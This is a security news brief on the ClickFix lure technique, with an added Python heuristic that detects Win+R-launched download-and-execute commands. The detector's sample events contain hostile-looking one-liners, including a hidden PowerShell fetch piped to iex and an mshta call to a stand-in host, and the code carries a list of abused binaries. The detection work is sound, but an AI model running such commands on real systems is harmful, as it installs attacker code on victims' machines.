ClickFix Technique Gains Popularity Among Cybercriminals and APT Groups for Attacking Victims

103/68 Monday, March 17, 2025

Cybersecurity firm Group-IB has revealed that since August 2024, state-sponsored hacker groups (APT groups) and cybercriminals have increasingly used the ClickFix technique in data-stealing malware attacks. ClickFix is a social engineering technique that uses JavaScript on web pages to display fake system update alerts or reCAPTCHA verification prompts. When victims follow the on-screen instructions, such as pressing Win+R and pasting the code that was copied to their clipboard, the malicious command executes immediately, leading to the installation of malware such as Lumma, XWorm RAT, and DarkGate on their devices.

Group-IB reports that hackers distribute malware through multiple channels, including phishing emails, malicious ads, spam messages on social media, and compromised websites. Notably, MuddyWater (Iran) and APT28 (Russia) have been observed using ClickFix in their operations, targeting users of movie, gaming, and pirated software websites, as well as GitHub users and business organizations. First discovered in 2023, ClickFix has evolved into a more sophisticated threat by 2025.

Recently, Microsoft issued a warning about cybercriminals exploiting ClickFix in North America, Europe, Oceania, and Asia. Meanwhile, Cofense has detailed its use in spreading XWorm RAT malware. Experts caution that ClickFix is expected to become even more advanced, urging users to avoid following instructions from untrusted websites and use modern security solutions to minimize the risk of falling victim to such attacks.
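One detection check that follows from the technique described above, as an added example (not code from Group-IB, Microsoft, Cofense or the source article): a heuristic over constructed process-creation events that flags script interpreters and download utilities started by explorer.exe (the host of the Win+R Run dialog) with download, hidden-window or encoded-command arguments. The JSON field names, binary list and sample events are assumptions for this example.

```python
import json
import re

# Constructed JSON-lines process-creation events (EDR/Sysmon-style field names),
# made up for this example; they are not telemetry from the article's sources.
SAMPLE_EVENTS = [
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -c iwr http://example.invalid/x|iex"}',
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta http://example.invalid/verify"}',
    r'{"ParentImage": "C:\\Windows\\explorer.exe", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd"}',
    r'{"ParentImage": "C:\\Program Files\\Code\\Code.exe", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell -w hidden -File build.ps1"}',
]

# Interpreters and download utilities a ClickFix lure typically asks the user to run (assumed list)
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe", "bitsadmin.exe"}

# Switches that a person typing into Win+R by hand almost never uses:
# hidden window, in-memory execution, a URL, or a long encoded command blob
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden|\biex\b|invoke-expression|https?://|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})",
    re.IGNORECASE,
)

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix_like(event: dict) -> bool:
    """True when explorer.exe (Run dialog host) started a scripting/download binary
    with download-and-execute style arguments. explorer.exe also parents programs
    launched from the Start menu, so the argument filter is what keeps this quiet."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return False
    if basename(event.get("Image", "")) not in LOLBINS:
        return False
    return SUSPICIOUS_ARGS.search(event.get("CommandLine", "")) is not None

def find_alerts(lines):
    """Return the command lines of JSON-line events matching the heuristic."""
    alerts = []
    for line in lines:
        event = json.loads(line)
        if is_clickfix_like(event):
            alerts.append(event["CommandLine"])
    return alerts

if __name__ == "__main__":
    for cmd in find_alerts(SAMPLE_EVENTS):
        print("ALERT:", cmd)
```

The plain `cmd` launch and the PowerShell started by an editor are intentionally not flagged, which is the noise the parent and argument conditions are there to remove. For after-the-fact forensics, the commands a user entered into Win+R are also recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.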

Source https://www.securityweek.com/clickfix-widely-adopted-by-cybercriminals-apt-groups/